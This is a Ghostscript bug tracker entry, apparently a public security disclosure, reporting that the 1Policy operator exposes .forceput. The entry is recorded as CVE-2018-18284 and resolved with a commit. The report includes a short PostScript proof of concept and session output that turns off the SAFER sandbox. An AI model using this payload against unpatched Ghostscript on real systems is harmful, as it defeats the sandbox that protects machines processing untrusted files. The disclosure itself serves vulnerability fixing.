Bug 699963 - 1Policy is a dangerous operator, any callers should be odef
Summary: 1Policy is a dangerous operator, any callers should be odef
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public) (show other bugs)
Version: unspecified
Hardware: PC Linux
: P4 normal
Assignee: Ken Sharp
QA Contact: gs-security
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-10-12 21:47 UTC by Tavis Ormandy
Modified: 2019-05-08 13:27 UTC (History)
1 user (show)

See Also:
Customer:
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy 2018-10-12 21:47:39 UTC
1Policy (from gs_setpd.ps) is basically a wrapper around .forceput, and therefore any callers need to be pseudo-operators.

Exploit:

/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def

GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

See bug 699816 for a full forceput exploit.
Comment 1 Tavis Ormandy 2018-10-13 00:28:10 UTC
This is CVE-2018-18284
Comment 2 Ken Sharp 2018-10-15 10:29:31 UTC
I have a fix but I want Chris to review it, so it'll be tomorrow before it gets applied, assuming Chris is happy with the change.
Comment 3 Ken Sharp 2018-10-16 08:35:38 UTC
Fixed in commit 30cd347f37bfb293ffdc407397d1023628400b81
Comment 4 Ken Sharp 2018-10-16 08:36:45 UTC
Oops :-( Wrong way round. This one is fixed with *this* commit 8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b